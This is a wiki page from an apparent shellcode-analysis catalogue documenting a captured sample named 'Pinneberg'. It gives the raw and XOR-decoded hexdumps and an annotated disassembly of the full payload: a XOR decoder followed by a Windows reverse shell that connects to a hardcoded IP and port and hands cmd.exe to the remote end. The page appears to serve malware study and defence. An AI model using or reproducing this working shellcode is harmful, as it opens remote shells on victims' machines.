[[csni:shellcodes:pinneberg]]
 
Trace: home » csni » shellcodes » pinneberg
Table of Contents

Pinneberg Shellcode

file csni:shellcodes:pinneberg:pinneberg.bin

Shellcode

raw

hexdump 

00000000  00 00 23 f8 29 00 ff 23  05 39 1e c8 68 22 39 05  |..#ø).ÿ#.9.Èh"9.|
00000010  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000030  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000060  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000070  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000080  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000090  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000000c0  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
000000d0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000000e0  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
000000f0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000120  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000140  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
00000150  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000170  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
00000180  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000001a0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000001d0  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
000001e0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000001f0  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000200  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000230  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
00000240  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000250  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
00000260  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000290  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000002b0  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
000002c0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000002e0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
000002f0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000310  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000340  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000350  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000360  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000370  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000003a0  7c f4 3d 05 90 90 90 90  90 90 90 90 90 90 90 90  ||ô=.............|
000003b0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000450  90 90 90 90 90 90 90 90  eb 10 5a 4a 33 c9 66 b9  |........ë.ZJ3Éf¹|
00000460  77 01 80 34 0a 99 e2 fa  eb 05 e8 eb ff ff ff cd  |w..4..âúë.èëÿÿÿÍ|
00000470  12 75 1a 75 b1 12 6d 71  60 99 99 99 10 9f 66 af  |.u.u±.mq`.....f¯|
00000480  f1 17 d7 97 75 71 9d 98  99 99 10 df 9d 66 af f1  |ñ.×.uq.....ß.f¯ñ|
00000490  eb 67 2a 8f 71 6c 99 99  99 10 df 91 66 af f1 76  |ëg*.ql....ß.f¯ñv|
000004a0  57 79 f9 71 7f 99 99 99  10 df 95 f1 aa ab 99 99  |Wyùq.....ß.ñª«..|
000004b0  f1 ee ea ab c6 cd 66 cf  9d 10 df 89 66 ef 89 f1  |ñîê«ÆÍfÏ..ß.fï.ñ|
000004c0  40 90 6c 34 71 5c 99 99  99 10 df 8d 66 ef 89 f1  |@.l4q\....ß.fï.ñ|
000004d0  75 60 33 f9 71 2c 99 99  99 10 df 81 66 ef 89 f1  |u`3ùq,....ß.fï.ñ|
000004e0  7e e0 5f e0 71 3c 99 99  99 10 df 85 66 ef 89 f1  |~à_àq<....ß.fï.ñ|
000004f0  52 74 65 a2 71 0c 99 99  99 10 df b9 18 75 09 98  |Rte¢q.....ß¹.u..|
00000500  99 99 cd f1 98 98 99 99  66 cf b9 c9 c9 c9 c9 d9  |..Íñ....fϹÉÉÉÉÙ|
00000510  c9 d9 c9 66 cf 8d 12 41  f1 47 38 f5 6c f1 9b 99  |ÉÙÉfÏ..AñG8õlñ..|
00000520  99 d4 12 55 f3 89 c8 ca  66 cf 81 1c 59 ec da f1  |.Ô.Uó.ÈÊfÏ..YìÚñ|
00000530  fa f4 fd 99 10 ff a9 1a  75 cd 14 a5 bd aa 50 1a  |úôý..ÿ©.uÍ.¥œªP.|
00000540  58 8c 32 7b 64 5f dd bd  89 dd 67 dd bd a4 10 c5  |X.2{d_Ýœ.ÝgÝœ€.Å|
00000550  bd d1 10 c5 bd d5 10 c5  bd c9 14 dd bd 89 cd c9  |œÑ.ÅœÕ.ÅœÉ.Ýœ.ÍÉ|
00000560  c8 c8 c8 f3 98 c8 c8 66  ef a9 c8 66 cf 91 ca 66  |ÈÈÈó.ÈÈfï©ÈfÏ.Êf|
00000570  cf 85 66 cf 95 cc cf fd  38 a9 99 99 99 12 d9 95  |Ï.fÏ.ÌÏý8©....Ù.|
00000580  12 e9 85 34 12 f1 91 12  5c c7 c4 5b 9d 99 ca cc  |.é.4.ñ..\ÇÄ[..ÊÌ|
00000590  cf ce 12 f5 bd 81 12 dc  a5 12 cd 9c e1 9a 4c 12  |ÏÎ.õœ..Ü¥.Í.á.L.|
000005a0  d3 81 12 c3 b9 9a 44 7a  ab d0 12 ad 12 9a 6c aa  |Ó..ù.Dz«Ð.­..lª|
000005b0  66 65 aa 59 35 a3 5d ed  9e 58 56 94 9a 61 72 6b  |feªY5£]í.XV..ark|
000005c0  a2 e5 bd 8d ec 78 12 c3  bd 9a 44 ff 12 95 d2 12  |¢åœ.ìx.Ãœ.Dÿ..Ò.|
000005d0  c3 85 9a 44 12 9d 12 9a  5c 72 9b aa 59 12 4c c6  |Ã..D....\r.ªY.LÆ|
000005e0  c7 c4 c2 5b 9d 99 00 90  90 90 90 90 90 90 90 90  |ÇÄÂ[............|
000005f0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000023f0  90 90 90 90 90 90 90 90  90 90 90 90              |............|
000023fc

unxor'd 

00000000  00 00 23 f8 29 00 ff 23  05 39 1e c8 68 22 39 05  |..#ø).ÿ#.9.Èh"9.|
00000010  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000030  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000060  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000070  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000080  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000090  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000000c0  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
000000d0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000000e0  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
000000f0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000120  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000140  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
00000150  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000170  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
00000180  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000001a0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000001d0  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
000001e0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000001f0  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000200  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000230  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
00000240  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000250  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
00000260  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000290  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000002b0  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
000002c0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000002e0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
000002f0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000310  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000340  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000350  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000360  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000370  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000003a0  7c f4 3d 05 90 90 90 90  90 90 90 90 90 90 90 90  ||ô=.............|
000003b0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000460  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 54  |...............T|
00000470  8b ec 83 ec 28 8b f4 e8  f9 00 00 00 89 06 ff 36  |.ì.ì(.ôèù.....ÿ6|
00000480  68 8e 4e 0e ec e8 04 01  00 00 89 46 04 ff 36 68  |h.N.ìè.....F.ÿ6h|
00000490  72 fe b3 16 e8 f5 00 00  00 89 46 08 ff 36 68 ef  |rþ³.èõ....F.ÿ6hï|
000004a0  ce e0 60 e8 e6 00 00 00  89 46 0c 68 33 32 00 00  |Îà`èæ....F.h32..|
000004b0  68 77 73 32 5f 54 ff 56  04 89 46 10 ff 76 10 68  |hws2_TÿV..F.ÿv.h|
000004c0  d9 09 f5 ad e8 c5 00 00  00 89 46 14 ff 76 10 68  |Ù.õ­èÅ....F.ÿv.h|
000004d0  ec f9 aa 60 e8 b5 00 00  00 89 46 18 ff 76 10 68  |ìùª`èµ....F.ÿv.h|
000004e0  e7 79 c6 79 e8 a5 00 00  00 89 46 1c ff 76 10 68  |çyÆyè¥....F.ÿv.h|
000004f0  cb ed fc 3b e8 95 00 00  00 89 46 20 81 ec 90 01  |Ëíü;è.....F .ì..|
00000500  00 00 54 68 01 01 00 00  ff 56 20 50 50 50 50 40  |..Th....ÿV PPPP@|
00000510  50 40 50 ff 56 14 8b d8  68 de a1 6c f5 68 02 00  |P@PÿV..ØhÞ¡lõh..|
00000520  00 4d 8b cc 6a 10 51 53  ff 56 18 85 c0 75 43 68  |.M.Ìj.QSÿV..ÀuCh|
00000530  63 6d 64 00 89 66 30 83  ec 54 8d 3c 24 33 c9 83  |cmd..f0.ìT.<$3É.|
00000540  c1 15 ab e2 fd c6 44 24  10 44 fe 44 24 3d 89 5c  |Á.«âýÆD$.DþD$=.\|
00000550  24 48 89 5c 24 4c 89 5c  24 50 8d 44 24 10 54 50  |$H.\$L.\$P.D$.TP|
00000560  51 51 51 6a 01 51 51 ff  76 30 51 ff 56 08 53 ff  |QQQj.QQÿv0QÿV.Sÿ|
00000570  56 1c ff 56 0c 55 56 64  a1 30 00 00 00 8b 40 0c  |V.ÿV.UVd¡0....@.|
00000580  8b 70 1c ad 8b 68 08 8b  c5 5e 5d c2 04 00 53 55  |.p.­.h..Å^]Â..SU|
00000590  56 57 8b 6c 24 18 8b 45  3c 8b 54 05 78 03 d5 8b  |VW.l$..E<.T.x.Õ.|
000005a0  4a 18 8b 5a 20 03 dd e3  32 49 8b 34 8b 03 f5 33  |J..Z .Ýã2I.4..õ3|
000005b0  ff fc 33 c0 ac 3a c4 74  07 c1 cf 0d 03 f8 eb f2  |ÿü3À¬:Ät.ÁÏ..øëò|
000005c0  3b 7c 24 14 75 e1 8b 5a  24 03 dd 66 8b 0c 4b 8b  |;|$.uá.Z$.Ýf..K.|
000005d0  5a 1c 03 dd 8b 04 8b 03  c5 eb 02 33 c0 8b d5 5f  |Z..Ý....Åë.3À.Õ_|
000005e0  5e 5d 5b c2 04 00 00 90  90 90 90 90 90 90 90 90  |^][Â............|
000005f0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000023f0  90 90 90 90 90 90 90 90  90 90 90 90              |............|
000023fc

Analysis

XOR decoder (uses bielefeld xor)

00421A39   EB 10            JMP SHORT dummy2.00421A4B
00421A3B   5A               POP EDX
00421A3C   4A               DEC EDX
00421A3D   33C9             XOR ECX,ECX
00421A3F   66:B9 7701       MOV CX,177
00421A43   80340A 99        XOR BYTE PTR DS:[EDX+ECX],99
00421A47  ^E2 FA            LOOPD SHORT dummy2.00421A43
00421A49   EB 05            JMP SHORT dummy2.00421A50
00421A4B   E8 EBFFFFFF      CALL dummy2.00421A3B

unxor'd shellcode 

00421A50   54               PUSH ESP
00421A51   8BEC             MOV EBP,ESP
00421A53   83EC 28          SUB ESP,28
00421A56   8BF4             MOV ESI,ESP
00421A58   E8 F9000000      CALL dummy2.00421B56
00421A5D   8906             MOV DWORD PTR DS:[ESI],EAX
00421A5F   FF36             PUSH DWORD PTR DS:[ESI]
00421A61   68 8E4E0EEC      PUSH EC0E4E8E
00421A66   E8 04010000      CALL dummy2.00421B6F
00421A6B   8946 04          MOV DWORD PTR DS:[ESI+4],EAX             ; store LoadLibraryA
00421A6E   FF36             PUSH DWORD PTR DS:[ESI]
00421A70   68 72FEB316      PUSH 16B3FE72
00421A75   E8 F5000000      CALL dummy2.00421B6F                     ; store CreateProcessA
00421A7A   8946 08          MOV DWORD PTR DS:[ESI+8],EAX
00421A7D   FF36             PUSH DWORD PTR DS:[ESI]
00421A7F   68 EFCEE060      PUSH 60E0CEEF
00421A84   E8 E6000000      CALL dummy2.00421B6F
00421A89   8946 0C          MOV DWORD PTR DS:[ESI+C],EAX             ; store ExitThread
00421A8C   68 33320000      PUSH 3233
00421A91   68 7773325F      PUSH 5F327377
00421A96   54               PUSH ESP
00421A97   FF56 04          CALL DWORD PTR DS:[ESI+4]                ; call loadlibrarya
00421A9A   8946 10          MOV DWORD PTR DS:[ESI+10],EAX
00421A9D   FF76 10          PUSH DWORD PTR DS:[ESI+10]
00421AA0   68 D909F5AD      PUSH ADF509D9
00421AA5   E8 C5000000      CALL dummy2.00421B6F
00421AAA   8946 14          MOV DWORD PTR DS:[ESI+14],EAX            ; store WSASocketA
00421AAD   FF76 10          PUSH DWORD PTR DS:[ESI+10]
00421AB0   68 ECF9AA60      PUSH 60AAF9EC
00421AB5   E8 B5000000      CALL dummy2.00421B6F
00421ABA   8946 18          MOV DWORD PTR DS:[ESI+18],EAX            ; store connect
00421ABD   FF76 10          PUSH DWORD PTR DS:[ESI+10]
00421AC0   68 E779C679      PUSH 79C679E7
00421AC5   E8 A5000000      CALL dummy2.00421B6F
00421ACA   8946 1C          MOV DWORD PTR DS:[ESI+1C],EAX            ; store closesocket
00421ACD   FF76 10          PUSH DWORD PTR DS:[ESI+10]
00421AD0   68 CBEDFC3B      PUSH 3BFCEDCB
00421AD5   E8 95000000      CALL dummy2.00421B6F
00421ADA   8946 20          MOV DWORD PTR DS:[ESI+20],EAX            ; store WSAStartup
00421ADD   81EC 90010000    SUB ESP,190
00421AE3   54               PUSH ESP
00421AE4   68 01010000      PUSH 101
00421AE9   FF56 20          CALL DWORD PTR DS:[ESI+20]               ; call WSAStartup
00421AEC   50               PUSH EAX
00421AED   50               PUSH EAX
00421AEE   50               PUSH EAX
00421AEF   50               PUSH EAX
00421AF0   40               INC EAX
00421AF1   50               PUSH EAX
00421AF2   40               INC EAX
00421AF3   50               PUSH EAX
00421AF4   FF56 14          CALL DWORD PTR DS:[ESI+14]               ; call WSASocketA
00421AF7   8BD8             MOV EBX,EAX
00421AF9   68 DEA16CF5      PUSH F56CA1DE                            ; ip
00421AFE   68 0200004D      PUSH 4D000002                            ; port
00421B03   8BCC             MOV ECX,ESP
00421B05   6A 10            PUSH 10
00421B07   51               PUSH ECX
00421B08   53               PUSH EBX
00421B09   FF56 18          CALL DWORD PTR DS:[ESI+18]               ; call connect
00421B0C   85C0             TEST EAX,EAX
00421B0E   75 43            JNZ SHORT dummy2.00421B53
00421B10   68 636D6400      PUSH 646D63
00421B15   8966 30          MOV DWORD PTR DS:[ESI+30],ESP
00421B18   83EC 54          SUB ESP,54
00421B1B   8D3C24           LEA EDI,DWORD PTR SS:[ESP]
00421B1E   33C9             XOR ECX,ECX
00421B20   83C1 15          ADD ECX,15
00421B23   AB               STOS DWORD PTR ES:[EDI]
00421B24  ^E2 FD            LOOPD SHORT dummy2.00421B23
00421B26   C64424 10 44     MOV BYTE PTR SS:[ESP+10],44
00421B2B   FE4424 3D        INC BYTE PTR SS:[ESP+3D]
00421B2F   895C24 48        MOV DWORD PTR SS:[ESP+48],EBX
00421B33   895C24 4C        MOV DWORD PTR SS:[ESP+4C],EBX
00421B37   895C24 50        MOV DWORD PTR SS:[ESP+50],EBX
00421B3B   8D4424 10        LEA EAX,DWORD PTR SS:[ESP+10]
00421B3F   54               PUSH ESP
00421B40   50               PUSH EAX
00421B41   51               PUSH ECX
00421B42   51               PUSH ECX
00421B43   51               PUSH ECX
00421B44   6A 01            PUSH 1
00421B46   51               PUSH ECX
00421B47   51               PUSH ECX
00421B48   FF76 30          PUSH DWORD PTR DS:[ESI+30]
00421B4B   51               PUSH ECX
00421B4C   FF56 08          CALL DWORD PTR DS:[ESI+8]                ; call CreateThread
00421B4F   53               PUSH EBX
00421B50   FF56 1C          CALL DWORD PTR DS:[ESI+1C]               ; call closesocket
00421B53   FF56 0C          CALL DWORD PTR DS:[ESI+C]                ; call ExitThread
00421B56   55               PUSH EBP
00421B57   56               PUSH ESI
00421B58   64:A1 30000000   MOV EAX,DWORD PTR FS:[30]
00421B5E   8B40 0C          MOV EAX,DWORD PTR DS:[EAX+C]
00421B61   8B70 1C          MOV ESI,DWORD PTR DS:[EAX+1C]
00421B64   AD               LODS DWORD PTR DS:[ESI]
00421B65   8B68 08          MOV EBP,DWORD PTR DS:[EAX+8]
00421B68   8BC5             MOV EAX,EBP
00421B6A   5E               POP ESI
00421B6B   5D               POP EBP
00421B6C   C2 0400          RETN 4
00421B6F   53               PUSH EBX
00421B70   55               PUSH EBP
00421B71   56               PUSH ESI
00421B72   57               PUSH EDI
00421B73   8B6C24 18        MOV EBP,DWORD PTR SS:[ESP+18]
00421B77   8B45 3C          MOV EAX,DWORD PTR SS:[EBP+3C]
00421B7A   8B5405 78        MOV EDX,DWORD PTR SS:[EBP+EAX+78]
00421B7E   03D5             ADD EDX,EBP
00421B80   8B4A 18          MOV ECX,DWORD PTR DS:[EDX+18]
00421B83   8B5A 20          MOV EBX,DWORD PTR DS:[EDX+20]
00421B86   03DD             ADD EBX,EBP
00421B88   E3 32            JECXZ SHORT dummy2.00421BBC
00421B8A   49               DEC ECX
00421B8B   8B348B           MOV ESI,DWORD PTR DS:[EBX+ECX*4]
00421B8E   03F5             ADD ESI,EBP
00421B90   33FF             XOR EDI,EDI
00421B92   FC               CLD
00421B93   33C0             XOR EAX,EAX
00421B95   AC               LODS BYTE PTR DS:[ESI]
00421B96   3AC4             CMP AL,AH
00421B98   74 07            JE SHORT dummy2.00421BA1
00421B9A   C1CF 0D          ROR EDI,0D
00421B9D   03F8             ADD EDI,EAX
00421B9F  ^EB F2            JMP SHORT dummy2.00421B93
00421BA1   3B7C24 14        CMP EDI,DWORD PTR SS:[ESP+14]
00421BA5  ^75 E1            JNZ SHORT dummy2.00421B88
00421BA7   8B5A 24          MOV EBX,DWORD PTR DS:[EDX+24]
00421BAA   03DD             ADD EBX,EBP
00421BAC   66:8B0C4B        MOV CX,WORD PTR DS:[EBX+ECX*2]
00421BB0   8B5A 1C          MOV EBX,DWORD PTR DS:[EDX+1C]
00421BB3   03DD             ADD EBX,EBP
00421BB5   8B048B           MOV EAX,DWORD PTR DS:[EBX+ECX*4]
00421BB8   03C5             ADD EAX,EBP
00421BBA   EB 02            JMP SHORT dummy2.00421BBE
00421BBC   33C0             XOR EAX,EAX
00421BBE   8BD5             MOV EDX,EBP
00421BC0   5F               POP EDI
00421BC1   5E               POP ESI
00421BC2   5D               POP EBP
00421BC3   5B               POP EBX
00421BC4   C2 0400          RETN 4
00421BC7   0090 90909090    ADD BYTE PTR DS:[EAX+90909090],DL
00421BCD   90               NOP
 
csni/shellcodes/pinneberg.txt · Last modified: 2006/02/17 14:01
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki